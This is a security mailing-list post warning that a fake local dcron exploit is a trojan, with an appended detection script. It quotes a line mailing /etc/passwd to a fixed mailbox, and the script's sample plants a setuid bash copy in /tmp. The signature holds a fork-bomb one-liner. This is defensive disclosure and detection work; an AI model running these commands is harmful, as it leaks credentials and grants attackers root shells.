Vulnerability Development mailing list archives
yet another fake exploit making rounds
From: Michal Zalewski <lcamtuf () coredump cx>
Date: Thu, 20 Dec 2001 21:58:55 -0500 (EST)
Hello,

Most recent (third) issue of "el8" zine, available at http://el8.8m.com, among other things claims to have a "0-day" dcron exploit, allegedly coded by me and Rafal Wojtczuk (Nergal).

    /*************************************************************************\
    | ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- |
    |                                                                         |
    |                           brought to you by                             |
    |                                                                         |
    | (C) Michal Zalewski <lcamtuf () ids pl> . and . Nergal <nergal () icm edu pl> |
    |                                                                         |
    | ----------------------------------------------------------------------- |
    | Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
    | ----------------------------------------------------------------------- |
    |                                                                         |
    \*************************************************************************/

    [...cut...]

This so-called exploit is already making rounds, not only in the script kiddie community, but also being run by many admins to test their boxes. I got reports from several people letting me know "it did not work".

I looked at it, and it appears to be a very nicely crafted trojan horse. It does send your /etc/passwd file to a fixed address your-address () mail com (source code suggests this is only a default, and can be changed by the victim, but because of an always-true conditional expression, the user-specified value is overwritten later; this mailbox is probably valid and attended):

    /.../
      email_address=(char*)strdup(optarg);
      break;
    /.../
    if(email_address) {
      email_address=DEFAULT_EMAIL_ADDRESS;
    }
    /.../
    fprintf(temp,"mail %s < /etc/passwd\n",email_address);

Other than that, this exploit will also create a suid copy of /bin/bash in the /tmp directory, named 'boomsh'. Even if it was not executed as root, it still gives the attacker an opportunity to escalate privileges locally and gain access to other accounts, perhaps after guessing at least one password.

You probably do not want to run this exploit; the same applies to all other exploits coming from untrusted sources =)

-- 
_____________________________________________________
Michal Zalewski [lcamtuf () bos bindview com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};: =-=>
Did you know that clones never use mirrors? <=-=
http://lcamtuf.coredump.cx/photo/
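The three tells described in the post (mailing /etc/passwd to a hard-coded mailbox, copying a shell to /tmp with the setuid bit, and a non-NULL check that immediately clobbers the user-supplied value with a constant) lend themselves to a quick pre-run source triage. The following is an added example, not code from the post or from the el8 zine; the C excerpt it scans is a constructed approximation of the snippet quoted above, with a placeholder mailbox, and the rule names are the author's own.

```python
import re

# Constructed excerpt modelled on the snippet quoted in the post (not the real el8 source).
# The mailbox is a placeholder standing in for the address the post names.
SAMPLE_SOURCE = r'''
#define DEFAULT_EMAIL_ADDRESS "your-address@example.com"
case 'e': email_address=(char*)strdup(optarg); break;
if(email_address) { email_address=DEFAULT_EMAIL_ADDRESS; }
fprintf(temp,"mail %s < /etc/passwd\n",email_address);
system("cp /bin/bash /tmp/boomsh; chmod 4755 /tmp/boomsh");
'''

# Each rule is (name, regex). Together they cover the behaviours the post describes.
RULES = [
    # piping a sensitive file into a mail command
    ("exfil-passwd-via-mail", re.compile(r'\bmail\b[^;\n]*<\s*/etc/passwd')),
    # a copy of a shell being planted under /tmp
    ("shell-copy-to-tmp", re.compile(r'\bcp\s+/bin/(ba)?sh\s+/tmp/')),
    # setuid bit set numerically (4xxx) or symbolically (+s)
    ("setuid-bit", re.compile(r'chmod\s+(?:[0-7]*4[0-7]{3}|[ugo]*\+s)')),
    # "if (p) { p = CONSTANT; }": a truthy check that discards user input
    # instead of filling in a default when the value is missing
    ("default-overrides-user-value",
     re.compile(r'if\s*\(\s*(\w+)\s*\)\s*\{?\s*\1\s*=\s*[A-Z_]+')),
]

def triage(source: str) -> dict:
    """Return {rule_name: [line numbers]} for every rule that fires on the source."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits: dict) -> str:
    """Exfiltration or a setuid shell drop is a hard stop; anything else gets a human look."""
    blocking = {"exfil-passwd-via-mail", "shell-copy-to-tmp", "setuid-bit"}
    return "DO NOT RUN" if blocking & hits.keys() else "review manually"

if __name__ == "__main__":
    found = triage(SAMPLE_SOURCE)
    for name, lines in found.items():
        print(f"{name}: line(s) {lines}")
    print(verdict(found))
```

The regexes are deliberately narrow; they catch the idioms from this particular trojan, not obfuscated variants, so a clean run is a reason to keep reading, not a clean bill of health.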
Current thread:
- yet another fake exploit making rounds Michal Zalewski (Dec 20)
- <Possible follow-ups>
- RE: yet another fake exploit making rounds Wall, Kevin (Dec 21)
- Re: yet another fake exploit making rounds xbud (Dec 21)
- Re: yet another fake exploit making rounds Michal Zalewski (Dec 21)
- RE: yet another fake exploit making rounds auto241065 (Dec 22)